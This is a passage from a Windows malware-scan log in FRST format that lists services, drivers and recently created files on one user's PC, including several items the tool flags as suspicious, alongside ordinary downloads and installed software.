S2 isesrv; C:\Program Files (x86)\COMODO\Internet Security Essentials\isesrv.exe [118480 2017-03-30] (COMODO)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 mi-raysat_3dsmax2014_64; D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64server.exe [86016 2011-09-15] () [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2014-05-29] ()
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [7986816 2016-11-06] (INCA Internet Co., Ltd.)
S2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [464440 2017-01-20] (NVIDIA Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1593632 2014-01-21] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [16939296 2014-01-21] (NVIDIA Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [966336 2014-12-04] (@ByELDI) [File not signed]
R2 Stuffit Archive Name Service; C:\Program Files (x86)\Smith Micro\StuffIt 12.0.1\ArcNameService.exe [157016 2008-05-23] (Smith Micro Software, Inc.)
R2 TabletService; C:\Genius\ioTablet\TabletService.exe [25600 2012-02-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
S2 windowsmanagementservice; C:\Users\Mehrad\AppData\Local\wkynx\ct.exe [947200 2017-03-29] (Google Inc.) [File not signed] <==== ATTENTION
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.2.0.5\WsAppService.exe [411648 2016-03-31] (Wondershare) [File not signed]
R2 XperiaCompanionService; C:\Program Files\Sony\Xperia Companion\Service\XperiaCompanionService.exe [2205568 2017-02-07] (Sony)
R2 ZapyaService; C:\Program Files (x86)\Zapya-en\ZapyaService.exe [116472 2015-04-03] ()
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3816176 2014-05-29] (Intel® Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 AFTrafMgr1.2; C:\Program Files (x86)\Hotspot Shield\bin\TrafMgr_1_2_64.sys [57272 2017-02-16] (AnchorFree Inc.)
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [303616 2017-02-11] () [File not signed]
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [122072 2014-12-12] (BlueStack Systems)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32232 2017-03-28] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [822776 2017-03-28] (COMODO)
R0 drmkpro64; C:\Windows\System32\drivers\ndistpr64.sys [78112 2013-09-28] () [File not signed] <==== ATTENTION
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 ETDSMBus; C:\Windows\system32\DRIVERS\ETDSMBus.sys [24904 2014-03-11] (ELAN Microelectronic Corp.)
S3 ggsomc; C:\Windows\System32\drivers\ggsomc.sys [30424 2016-03-26] (Sony Mobile Communications)
S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2017-02-27] (LogMeIn Inc.)
R3 ioFakDrv; C:\Windows\System32\drivers\ioFakDrv.sys [24888 2013-09-10] (KYE System Corp.)
R3 ioFakMap; C:\Windows\System32\drivers\ioFakMap.sys [13624 2013-09-10] (KYE System Corp.)
R3 ioTablet; C:\Windows\System32\drivers\ioTablet.sys [41784 2013-09-10] (KYE System Corp.)
R3 ioTblMap; C:\Windows\System32\drivers\ioTblMap.sys [13624 2013-09-10] (KYE System Corp.)
R1 isedrv; C:\Windows\system32\drivers\isedrv.sys [62208 2017-03-30] (COMODO)
R1 ISODrive; C:\Program Files (x86)\UltraISO\drivers\ISODrv64.sys [115448 2013-11-21] (EZB Systems, Inc.)
S2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [35328 2017-02-11] () [File not signed]
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [39200 2013-12-27] (NVIDIA Corporation)
R3 RtkBtFilter; C:\Windows\system32\DRIVERS\RtkBtfilter.sys [617248 2017-03-02] (Realtek Semiconductor Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [779232 2017-03-02] (Realsil Semiconductor Corporation)
R3 rtsuvc; C:\Windows\system32\DRIVERS\rtsuvc.sys [9121496 2014-06-10] (Realtek Semiconductor Corp.)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3495640 2017-03-02] (Realtek Semiconductor Corporation )
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
R3 taphss6; C:\Windows\system32\DRIVERS\taphss6.sys [42064 2016-09-30] (Anchorfree Inc.)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-04-24 18:54 - 2017-04-24 18:54 - 00014586 _____ C:\Users\Mehrad\Downloads\fixlist.txt
2017-04-24 18:50 - 2017-04-24 18:50 - 00000000 ____H C:\ProgramData\cm-lock
2017-04-24 18:46 - 2017-04-24 18:46 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2017-04-24 18:10 - 2017-04-24 18:10 - 00000000 ____D C:\Windows\pss
2017-04-24 13:33 - 2017-04-24 13:33 - 00001240 _____ C:\Users\Public\Desktop\COMODO Antivirus.lnk
2017-04-24 13:33 - 2017-04-24 13:33 - 00001240 _____ C:\ProgramData\Desktop\COMODO Antivirus.lnk
2017-04-24 13:33 - 2017-04-24 13:33 - 00000272 _____ C:\Windows\system32\Drivers\sfi.dat
2017-04-24 13:33 - 2017-04-24 13:33 - 00000000 ____D C:\Windows\System32\Tasks\COMODO
2017-04-24 13:33 - 2017-04-24 13:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-04-24 13:33 - 2017-04-24 13:33 - 00000000 ____D C:\Program Files\COMODO
2017-04-24 13:32 - 2017-04-24 13:32 - 00000000 ____D C:\Program Files (x86)\COMODO
2017-04-24 13:32 - 2017-03-30 07:40 - 00307960 _____ (COMODO) C:\Windows\system32\iseguard64.dll
2017-04-24 13:32 - 2017-03-30 07:40 - 00236792 _____ (COMODO) C:\Windows\SysWOW64\iseguard32.dll
2017-04-24 13:32 - 2017-03-30 02:19 - 00062208 _____ (COMODO) C:\Windows\system32\Drivers\isedrv.sys
2017-04-24 13:23 - 2017-04-24 13:32 - 00000000 ____D C:\ProgramData\Comodo
2017-04-24 13:23 - 2017-04-24 13:23 - 00000000 ____D C:\ProgramData\Shared Space
2017-04-24 13:23 - 2017-04-24 13:23 - 00000000 ____D C:\ProgramData\Comodo Downloader
2017-04-24 13:19 - 2017-04-24 13:19 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-24 12:49 - 2017-04-24 12:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\CAPCOM
2017-04-24 12:43 - 2017-04-24 12:43 - 00000761 _____ C:\Users\Mehrad\Desktop\Ultimate Marvel vs. Capcom 3.lnk
2017-04-24 12:43 - 2017-04-24 12:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ultimate Marvel vs. Capcom 3
2017-04-24 10:57 - 2017-04-24 16:22 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Pulelybowey
2017-04-24 10:57 - 2017-04-24 10:57 - 00006026 _____ C:\Windows\System32\Tasks\Toferk
2017-04-24 10:57 - 2017-04-24 10:57 - 00006004 _____ C:\Windows\System32\Tasks\Phucoing Verfier
2017-04-24 10:57 - 2017-04-24 10:57 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Thagutreazoght
2017-04-24 10:57 - 2017-04-24 10:57 - 00000000 ____D C:\Program Files (x86)\Phucoing Verfier
2017-04-24 10:57 - 2017-04-24 10:57 - 00000000 ____D C:\Program Files (x86)\Gerdolesilerly
2017-04-24 10:56 - 2017-04-24 11:00 - 00000000 ____D C:\Users\Mehrad\AppData\Local\ipscan(beta)
2017-04-24 04:41 - 2017-04-24 04:42 - 00000000 ____D C:\Users\Mehrad\Downloads\(Puniket 31) [BlueMage (Aoi Manabu)] Yoru no Fujiyama Volcano (Touhou Project)
2017-04-24 04:41 - 2017-04-24 04:41 - 00003027 _____ C:\Users\Mehrad\Downloads\(Puniket 31) [BlueMage (Aoi Manabu)] Yoru no Fujiyama Volcano (Touhou Project).torrent
2017-04-24 04:35 - 2017-04-24 04:36 - 00000000 ____D C:\Users\Mehrad\Downloads\[BlueMage (Aoi Manabu)] Koi Mash (Fate Grand Order) [2017-01-22]
2017-04-24 04:35 - 2017-04-24 04:35 - 00001708 _____ C:\Users\Mehrad\Downloads\[BlueMage (Aoi Manabu)] Koi Mash (Fate_Grand Order) [2017-01-22].torrent
2017-04-24 04:32 - 2017-04-24 04:34 - 00000000 ____D C:\Users\Mehrad\Downloads\(C91) [Bananatart (Kussie)] Hotaru-san wa Dagashi no Kaori (Dagashi Kashi)
2017-04-24 04:32 - 2017-04-24 04:32 - 00004546 _____ C:\Users\Mehrad\Downloads\(C91) [Bananatart (Kussie)] Hotaru-san wa Dagashi no Kaori_ (Dagashi Kashi).torrent
2017-04-24 04:23 - 2017-04-24 04:51 - 00003740 _____ C:\Windows\system32\DefaultLog.txt
2017-04-24 04:21 - 2017-04-24 04:21 - 00001045 _____ C:\Users\Public\Desktop\EaseUS Data Recovery Wizard.lnk
2017-04-24 04:21 - 2017-04-24 04:21 - 00001045 _____ C:\ProgramData\Desktop\EaseUS Data Recovery Wizard.lnk
2017-04-24 04:21 - 2017-04-24 04:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Data Recovery Wizard
2017-04-24 04:21 - 2017-04-24 04:21 - 00000000 ____D C:\Program Files\EaseUS
2017-04-24 03:54 - 2017-04-24 18:53 - 00000000 ____D C:\FRST
2017-04-24 02:31 - 2017-04-24 02:31 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign422ee1e4422605a8
2017-04-24 02:19 - 2017-04-24 02:53 - 00000000 ____D C:\Users\Mehrad\Desktop\Silent Hill Book Of Lost Memories
2017-04-24 02:00 - 2017-04-24 02:00 - 00000000 ____D C:\Users\Mehrad\AppData\Local\ntuserlitelist
2017-04-24 01:55 - 2017-04-24 10:56 - 00000000 ____D C:\ProgramData\RegisterObject
2017-04-24 01:54 - 2017-04-24 01:54 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\90504824
2017-04-24 01:53 - 2017-04-24 03:58 - 00000000 ____D C:\Program Files (x86)\s5
2017-04-24 01:53 - 2017-04-24 01:53 - 00000000 ____D C:\Users\Mehrad\AppData\Local\wkynx
2017-04-24 01:53 - 2017-04-24 01:53 - 00000000 ____D C:\Users\Mehrad\AppData\Local\owdrgu
2017-04-24 01:52 - 2017-04-24 01:52 - 00001938 ___RS C:\Users\Mehrad\Desktop\Мinecraft.lnk
2017-04-24 01:52 - 2017-04-24 01:52 - 00001493 ___RS C:\Users\Mehrad\Desktop\DАNGANRОNРA 2 Gооdbyе Desраir.lnk
2017-04-24 01:52 - 2017-04-24 01:52 - 00001459 ___RS C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Eхplorer.lnk
2017-04-24 01:52 - 2017-04-24 01:52 - 00001242 ___RS C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gооglе Chromе.lnk
2017-04-24 01:52 - 2017-04-24 01:52 - 00001119 ___RS C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzilla Firеfoх.lnk
2017-04-24 01:52 - 2017-04-24 01:52 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\SPI
2017-04-24 01:52 - 2017-04-24 01:52 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\c
2017-04-24 01:52 - 2017-04-24 01:52 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Browsers
2017-04-24 00:36 - 2017-04-24 00:41 - 19869410 _____ C:\Users\Mehrad\Desktop\heads merged.psd
2017-04-24 00:25 - 2017-04-24 00:25 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne55a404c47331e20
2017-04-23 23:52 - 2017-04-23 23:52 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign465bee44708b29f1
2017-04-23 15:01 - 2017-04-23 15:01 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign4d07f36a0cb7986f
2017-04-23 03:04 - 2017-04-23 03:04 - 00071056 _____ C:\Users\Mehrad\Downloads\[Yoshiura Kazuya] Kizashi Ch. 1-10(1).torrent
2017-04-23 03:00 - 2017-04-23 03:03 - 00000000 ____D C:\Users\Mehrad\Downloads\[Maki Tatsuki]Ochi kake anidumaChinese
2017-04-23 03:00 - 2017-04-23 03:00 - 00009176 _____ C:\Users\Mehrad\Downloads\[Maki Tatsuki]Ochi kake anidumaChinese.torrent
2017-04-23 02:52 - 2017-04-23 03:07 - 00000000 ____D C:\Users\Mehrad\Downloads\[Yoshiura Kazuya] Kizashi Ch 1-10
2017-04-23 02:51 - 2017-04-23 02:51 - 00071056 _____ C:\Users\Mehrad\Downloads\[Yoshiura Kazuya] Kizashi Ch. 1-10.torrent
2017-04-22 22:35 - 2017-04-22 22:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign9cf129c308af08a2
2017-04-21 20:56 - 2017-04-21 20:56 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf360348456de9a66
2017-04-21 20:29 - 2017-04-21 20:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignd20641e31a20048f
2017-04-21 19:00 - 2017-04-21 19:00 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign52aa81be263b7c81
2017-04-21 18:37 - 2017-04-21 18:37 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb47827775faced0f
2017-04-21 18:37 - 2017-04-21 18:37 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign90baf5f36f71f673
2017-04-21 05:03 - 2017-04-21 05:03 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb28cb8f77bac2adf
2017-04-21 04:50 - 2017-04-21 04:50 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne752baa8a9e77dd4
2017-04-21 04:30 - 2017-04-21 04:30 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna15f7b75644aed78
2017-04-21 04:30 - 2017-04-21 04:30 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8fd3b3d5faade2b0
2017-04-21 04:30 - 2017-04-21 04:30 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign65e9788607c1c921
2017-04-21 04:16 - 2017-04-21 04:16 - 00012175 _____ C:\Users\Mehrad\Downloads\images.htm
2017-04-21 03:59 - 2017-04-21 03:59 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign108490e97f6c5a62
2017-04-21 03:56 - 2017-04-21 03:56 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign71c96125879d0b31
2017-04-21 03:29 - 2017-04-21 03:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign58ec6b7129a4bedb
2017-04-21 03:18 - 2017-04-21 03:18 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign668193aef21f6109
2017-04-21 03:14 - 2017-04-21 03:14 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1d9726922a8dcc74
2017-04-21 02:40 - 2017-04-21 02:40 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign4e63d03b7bfc6ce3
2017-04-21 01:59 - 2017-04-21 01:59 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignfbd8f07fa48c4a15
2017-04-21 00:53 - 2017-04-21 00:53 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignca6c46db8755e1da
2017-04-21 00:42 - 2017-04-21 00:42 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignbe2f6630db8b6720
2017-04-20 21:41 - 2017-04-20 21:41 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign0786cc2ecbd42383
2017-04-20 21:11 - 2017-04-20 21:11 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7f90de48d2c8c2f8
2017-04-20 18:26 - 2017-04-20 18:26 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignc330679c9eb2fdd6
2017-04-20 17:03 - 2017-04-20 17:03 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf8635a45c26a83fb
2017-04-20 04:54 - 2017-04-20 04:54 - 00051817 _____ C:\Users\Mehrad\Downloads\Reiju2.htm
2017-04-20 04:52 - 2017-04-20 04:54 - 00000000 ____D C:\Users\Mehrad\Downloads\[Chonmage Teikoku (Magekichi)] Maid de Ane de Osananajimi de Sorekara
2017-04-20 04:52 - 2017-04-20 04:52 - 00015620 _____ C:\Users\Mehrad\Downloads\[Chonmage Teikoku (Magekichi)] Maid de Ane de Osananajimi de Sorekara....torrent
2017-04-20 02:04 - 2017-04-20 02:04 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign9bfc1b4d26b204ab
2017-04-20 01:49 - 2017-04-20 01:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignd75320fa19b05bc2
2017-04-20 00:42 - 2017-04-20 00:42 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign0f02686ef37f02a2
2017-04-19 19:49 - 2017-04-19 19:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna6653a4190ef8e5c
2017-04-19 19:04 - 2017-04-19 19:04 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign28cf3772c37c2603
2017-04-19 18:10 - 2017-04-19 21:14 - 00000000 ____D C:\Users\Mehrad\Desktop\0
2017-04-19 03:31 - 2017-04-19 03:31 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignceb7b769e4e7e93e
2017-04-19 03:25 - 2017-04-19 03:28 - 00000000 ____D C:\Users\Mehrad\Downloads\[Bubuzuke] Kakushite Ichiya no Saporyman (COMIC Koh 2016-09) [Chinese] [黑条汉化]
2017-04-19 02:55 - 2017-04-19 02:56 - 00011892 _____ C:\Users\Mehrad\Downloads\[Bubuzuke] Kakushite Ichiya no Saporyman (COMIC Koh 2016-09) [Chinese] [黑条汉化](2).torrent
2017-04-19 02:55 - 2017-04-19 02:55 - 00011892 _____ C:\Users\Mehrad\Downloads\[Bubuzuke] Kakushite Ichiya no Saporyman (COMIC Koh 2016-09) [Chinese] [黑条汉化](1).torrent
2017-04-19 02:46 - 2017-04-19 02:52 - 00000000 ____D C:\Users\Mehrad\Downloads\(C90) [Z A P (Zucchini)] Shirou-kun Harem!! Servant Hen (Fate stay night) [English] [desudesu]
2017-04-19 02:46 - 2017-04-19 02:46 - 00011892 _____ C:\Users\Mehrad\Downloads\[Bubuzuke] Kakushite Ichiya no Saporyman (COMIC Koh 2016-09) [Chinese] [黑条汉化].torrent
2017-04-19 02:45 - 2017-04-19 02:45 - 00013031 _____ C:\Users\Mehrad\Downloads\(C90) [Z.A.P. (Zucchini)] Shirou-kun Harem!! Servant Hen (Fate_stay night) [English] [desudesu](1).torrent
2017-04-19 02:37 - 2017-04-19 02:37 - 00007979 _____ C:\Users\Mehrad\Downloads\(C91) [Yorokobi no Kuni (JOY RIDE)] Yorokobi no Kuni Vol. 28 Futari no Seiki Futanari Mahou (Mahou Tsukai Precure!)(1).torrent
2017-04-19 02:34 - 2017-04-19 02:39 - 00000000 ____D C:\Users\Mehrad\Downloads\(C91) [Yorokobi no Kuni (JOY RIDE)] Yorokobi no Kuni Vol 28 Futari no Seiki Futanari Mahou (Mahou Tsukai Precure!)
2017-04-19 02:20 - 2017-04-19 02:20 - 00007979 _____ C:\Users\Mehrad\Downloads\(C91) [Yorokobi no Kuni (JOY RIDE)] Yorokobi no Kuni Vol. 28 Futari no Seiki Futanari Mahou (Mahou Tsukai Precure!).torrent
2017-04-19 02:19 - 2017-04-19 02:19 - 00013031 _____ C:\Users\Mehrad\Downloads\(C90) [Z.A.P. (Zucchini)] Shirou-kun Harem!! Servant Hen (Fate_stay night) [English] [desudesu].torrent
2017-04-19 00:13 - 2017-04-19 00:13 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign6e4d95b150e8217c
2017-04-18 17:44 - 2017-04-18 17:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign4df538d6f4e1b258
2017-04-17 23:10 - 2017-04-17 23:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign237f38800d147dee
2017-04-17 23:08 - 2017-04-17 23:08 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign699b763cb96d19c3
2017-04-17 23:08 - 2017-04-17 23:08 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5af3a549d5ffa263
2017-04-17 19:26 - 2017-04-17 19:26 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf56ab3a3ffc18e05
2017-04-17 19:02 - 2017-04-17 19:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign19d4c4436d387760
2017-04-17 18:18 - 2017-04-17 18:18 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5882b764d0526092
2017-04-17 17:44 - 2017-04-17 17:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignabba05e95f24ce3b
2017-04-17 09:13 - 2017-04-17 09:13 - 00493019 _____ C:\Users\Mehrad\Downloads\com.geteit.android.wobble_2.0.9_free-www.apkhere.com.apk
2017-04-17 02:05 - 2017-04-17 02:05 - 00004335 _____ C:\Users\Mehrad\Downloads\(C90) [Nanashiki (Nanase Masato)] Hotaru Horu 2 (Dagashi Kashi).torrent
2017-04-17 02:04 - 2017-04-17 02:04 - 00006542 _____ C:\Users\Mehrad\Downloads\(C91) [Majimeya (Isao)] Dagashi Kashi no Erohon Full Color (Dagashi Kashi) [English] {darknight}.torrent
2017-04-17 02:03 - 2017-04-17 02:04 - 00000000 ____D C:\Users\Mehrad\Downloads\(SC2016 Winter) [KOTORIBIDOU (koto)] Daga shikashite (Dagashi Kashi)
2017-04-17 02:02 - 2017-04-17 02:02 - 00003149 _____ C:\Users\Mehrad\Downloads\(SC2016 Winter) [KOTORIBIDOU (koto)] Daga shikashite (Dagashi Kashi).torrent
2017-04-17 02:01 - 2017-04-17 02:01 - 00000000 ____D C:\Users\Mehrad\Downloads\0H
2017-04-16 14:58 - 2017-04-16 14:58 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1d26b76d992b0337
2017-04-16 03:12 - 2017-04-16 03:12 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna94081958e98a912
2017-04-16 02:06 - 2017-04-16 02:10 - 33918919 _____ C:\Users\Mehrad\Downloads\Watch-dogs-2.apk
2017-04-15 21:55 - 2017-04-15 21:55 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf5ea6e82a8b0c6a0
2017-04-15 21:40 - 2017-04-15 21:40 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5c6c248c2d97031a
2017-04-15 21:36 - 2017-04-15 21:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne88e8a3866cf615e
2017-04-15 21:13 - 2017-04-15 21:13 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign615d8be9ea88072d
2017-04-15 21:03 - 2017-04-15 21:03 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignc66153e95bdd008e
2017-04-15 20:48 - 2017-04-15 20:57 - 21667545 _____ C:\Users\Mehrad\Downloads\com.agminstruments.drumpadmachine.apk
2017-04-15 13:02 - 2017-04-15 13:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1a5d9839973e9ec8
2017-04-15 02:44 - 2017-04-15 02:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigncc1f3eb0e64ff13a
2017-04-15 02:44 - 2017-04-15 02:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna206a17df52b7995
2017-04-15 02:44 - 2017-04-15 02:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign31f597d7b9928ba0
2017-04-15 02:34 - 2014-03-11 07:36 - 01738032 _____ C:\Windows\system32\SStudio.dll
2017-04-15 02:34 - 2014-03-06 14:05 - 01959128 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTSnMg64.cpl
2017-04-15 02:34 - 2014-03-05 02:41 - 01048824 _____ (SRS Labs, Inc.) C:\Windows\system32\slcnt64.dll
2017-04-15 02:34 - 2014-03-05 02:41 - 00889592 _____ (DTS, Inc.) C:\Windows\system32\sl3apo64.dll
2017-04-15 02:34 - 2014-03-05 02:41 - 00724728 _____ (DTS, Inc.) C:\Windows\system32\sltech64.dll
2017-04-15 02:34 - 2014-03-05 02:41 - 00246008 _____ (TODO: <Company name>) C:\Windows\system32\slprp64.dll
2017-04-15 02:34 - 2014-02-27 17:32 - 02162992 _____ (Yamaha Corporation) C:\Windows\system32\YamahaAE.dll
2017-04-15 02:34 - 2014-02-26 06:18 - 00942384 _____ (Nahimic Inc) C:\Windows\system32\NAHIMICAPOSettingsIPC.dll
2017-04-15 02:34 - 2014-02-26 06:17 - 05751048 _____ (Nahimic Inc) C:\Windows\system32\NAHIMICAPOlfx.dll
2017-04-15 02:34 - 2014-02-18 15:42 - 00882776 _____ (Waves Audio Ltd.) C:\Windows\SysWOW64\MaxxAudioAPOShell.dll
2017-04-15 02:34 - 2014-02-18 12:18 - 02396760 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxAudioAPO6064.dll
2017-04-15 02:34 - 2014-02-18 12:18 - 01424984 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxAudioAPO4064.dll
2017-04-15 02:34 - 2014-02-18 12:18 - 01423960 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxAudioAPO5064.dll
2017-04-15 02:34 - 2014-02-16 18:00 - 28314200 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxAudioVnA64.dll
2017-04-15 02:34 - 2014-02-16 18:00 - 12816472 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxVoiceAPO3064.dll
2017-04-15 02:34 - 2014-02-16 18:00 - 03927640 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxAudioVnN64.dll
2017-04-15 02:34 - 2014-01-31 14:58 - 00938608 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxVoiceAPO2064.dll
2017-04-15 02:34 - 2014-01-31 14:57 - 01313904 _____ (Waves Audio Ltd.) C:\Windows\system32\MaxxSpeechAPO64.dll
2017-04-15 02:34 - 2013-10-06 21:56 - 00501184 _____ (DTS) C:\Windows\system32\DTSU2PLFX64.dll
2017-04-15 02:34 - 2013-10-06 21:56 - 00487360 _____ (DTS) C:\Windows\system32\DTSU2PGFX64.dll
2017-04-15 02:34 - 2013-10-06 21:56 - 00415680 _____ (DTS) C:\Windows\system32\DTSU2PREC64.dll
2017-04-15 02:34 - 2013-08-20 15:07 - 00605496 _____ C:\Windows\system32\audioLibVc.dll
2017-04-15 02:34 - 2013-06-25 10:17 - 00871856 _____ (TOSHIBA Corporation) C:\Windows\system32\tossaeapo64.dll
2017-04-15 02:34 - 2013-06-25 10:17 - 00162224 _____ (TOSHIBA Corporation) C:\Windows\system32\toseaeapo64.dll
2017-04-15 02:34 - 2013-06-25 10:16 - 00582056 _____ (TOSHIBA Corporation) C:\Windows\system32\tosasfapo64.dll
2017-04-15 02:34 - 2013-06-21 08:31 - 00109848 _____ C:\Windows\system32\AcpiServiceVnA64.dll
2017-04-15 02:34 - 2013-04-03 11:43 - 00906800 _____ (Sony Corporation) C:\Windows\system32\MISS_APO.dll
